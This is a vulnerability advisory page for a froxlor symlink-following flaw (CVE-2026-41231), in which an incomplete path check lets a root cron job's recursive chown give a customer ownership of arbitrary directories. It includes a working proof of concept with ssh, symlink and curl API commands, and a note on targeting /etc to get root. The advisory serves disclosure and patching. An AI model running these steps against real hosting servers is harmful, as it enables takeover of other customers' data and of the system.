Skip to main content

Boteraser | Website and Server Security Solutions

🛡️ CVE-2026-41231 — froxlor

🟠 CVSS 8.0 — High ⚠️ Exploit Public CWE-59 NVD
8.0
CVSS Score
0 Low4 Medium7 High9 Critical10

Description

Froxlor has Incomplete Symlink Validation in DataDump.add() Allows Arbitrary Directory Ownership Takeover via Cron

Summary

DataDump.add() constructs the export destination path from user-supplied input without passing the $fixed_homedir parameter to FileDir::makeCorrectDir(), bypassing the symlink validation that was added to all other customer-facing path operations (likely as the fix for CVE-2023-6069). When the ExportCron runs as root, it executes chown -R on the resolved symlink target, allowing a customer to take ownership of arbitrary directories on the system.

Details

The vulnerability is an incomplete patch. After CVE-2023-6069, symlink validation was added to FileDir::makeCorrectDir() via a $fixed_homedir parameter. When provided, it walks each path component checking for symlinks that escape the customer's home directory (lines 134-157 of lib/Froxlor/FileDir.php).

Every customer-facing API command that builds a path from user input passes this parameter:

```php

// DirProtections.php:87

$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path, $customer['documentroot']);

// DirOptions.php:96

$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path, $customer['documentroot']);

// Ftps.php:178

$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path, $customer['documentroot']);

// SubDomains.php:585

return FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path, $customer['documentroot']);

```

But DataDump.add() was missed:

```php

// DataDump.php:88 — NO $fixed_homedir parameter

$path = FileDir::makeCorrectDir($customer['documentroot'] . '/' . $path);

```

The path flows unvalidated into a cron task (lib/Froxlor/Api/Commands/DataDump.php:133):

```php

Cronjob::inserttask(TaskId::CREATE_CUSTOMER_DATADUMP, $task_data);

```

When ExportCron::handle() runs as root, it executes at lib/Froxlor/Cron/System/ExportCron.php:232:

```php

FileDir::safe_exec('chown -R ' . (int)$data['uid'] . ':' . (int)$data['gid'] . ' ' . escapeshellarg($data['destdir']));

```

The chown -R command follows symlinks in its target argument. If $data['destdir'] resolves through a symlink to an arbitrary directory, the attacker's UID/GID is applied recursively to that directory and all its contents.

The Validate::validate() call on line 86 uses an empty pattern, which falls back to /^[^\r\n\t\f\0]*$/D — this only strips control characters and does not prevent symlink names. makeSecurePath() strips shell metacharacters and .. traversal but does not check for symlinks.

PoC

Prerequisites:

  • system.exportenabled = 1 (admin setting)
  • Customer account with API key and FTP/SSH access

```bash

# Step 1: Create a symlink inside the customer's docroot pointing to a victim directory

# (customer has FTP/SSH access to their own docroot)

ssh customer@server 'ln -s /var/customers/webs/victim_customer /var/customers/webs/attacker_customer/steal'

# Step 2: Schedule data export via API with path pointing to the symlink

curl -X POST \

-H "Content-Type: application/json" \

-d '{"header":{"apikey":"CUSTOMER_API_KEY","secret":"CUSTOMER_API_SECRET"},"body":{"command":"DataDump.add","params":{"path":"steal","dump_web":"1"}}}' \

https://panel.example.com/api.php

# Expected response: 200 OK with task_data including destdir

# Step 3: Wait for ExportCron to run (hourly cron as root)

# The cron executes:

# mkdir -p '/var/customers/webs/attacker_customer/steal/' (follows symlink, dir exists)

# tar cfz ... -C /var/customers/webs/attacker_customer/ . (tars attacker's web data)

# chown -R <attacker_uid>:<attacker_gid> '/var/customers/webs/attacker_customer/steal/.tmp/'

# mv export.tar.gz '/var/customers/webs/attacker_customer/steal/'

# chown -R <attacker_uid>:<attacker_gid> '/var/customers/webs/attacker_customer/steal/'

#

# The final chown resolves the symlink and recursively chowns

# /var/customers/webs/victim_customer/ to the attacker's UID/GID.

# Step 4: Attacker now owns all of victim's web files

ssh customer@server 'ls -la /var/customers/webs/victim_customer/'

# All files now owned by attacker_customer UID

# For system-level escalation, the symlink can target /etc:

# ln -s /etc /var/customers/webs/attacker_customer/steal

# After cron: attacker owns /etc/passwd, /etc/shadow → root shell

```

Impact

  • Horizontal privilege escalation: A customer can take ownership of any other customer's web files, databases exports, and email data on the same server.
  • Vertical privilege escalation: By targeting system directories (e.g., /etc), the customer can gain read/write access to /etc/passwd and /etc/shadow, enabling creation of a root account or password modification.
  • Data breach: Full read access to all files in the targeted directory tree, including configuration files with database credentials, application secrets, and user data.
  • Service disruption: Changing ownership of system directories can b

How this vulnerability can be exploited

This issue can be reached over the network, attack complexity is high, an attacker needs low-level privileges on the target. No user interaction is required. The scope is unchanged, so the impact stays within the vulnerable component. Rated impact: confidentiality high, integrity high, availability high.

CVSS metrics in full

The score comes from this vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

  • Attack vector: Network — reachable from anywhere that can route to the service.
  • Attack complexity: High — the attacker first has to win a race, learn a secret or otherwise prepare the target.
  • Privileges required: Low — an ordinary user account is enough.
  • User interaction: None — nobody has to be tricked into anything.
  • Scope: Unchanged — the damage stays inside the vulnerable component.
  • Confidentiality impact: High — total loss, or loss the attacker controls.
  • Integrity impact: High — total loss, or loss the attacker controls.
  • Availability impact: High — total loss, or loss the attacker controls.

Weakness class

CVE-2026-41231 is classified as CWE-59: Link Following. The software follows symbolic or hard links without verifying their target, so a planted link can redirect an operation to a sensitive file.

Affected software

CVE-2026-41231 is recorded against 2 packages.

  • froxlor (fixed in 2.3.6)
  • froxlor/froxlor (fixed in 2.3.6)

Timeline and source

Published on 23 April 2026 and last revised on 17 June 2026. A public exploit is known to exist, which raises the urgency of patching considerably. A vendor advisory or fix has been published. Record sourced from NVD.

References

github.com
github.com
github.com
github.com

Other advisories for this package

froxlor has other advisories on record. If you are patching this one, these are worth checking on the same host:

Same weakness in other software

These advisories are the same class of weakness (CWE-59: Link Following) in other software:

Details

Severity HIGH
CVSS Score 8.0
CVSS Vector CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE CWE-59
Public Exploit ⚠️ Yes
Source NVD
Published 2026-04-23
Updated 2026-08-20
Modified 2026-06-17

Affected Packages

Software From version Fixed in
froxlor 2.3.6
froxlor/froxlor 2.3.6

Similar Threats

Exploit Protection

Are you running froxlor?

CVE-2026-41231 carries CVSS 8.0 High rating and a public exploit already exists. BotEraser checks your installation against this and other known CVE records, and blocks IPs associated with exploit activity.

Check My Site For CVE-2026-41231 →

No credit card required  ·  Results in minutes

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the vulnerabilities listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.

Browse related advisories

All advisoriesCVECVE 2026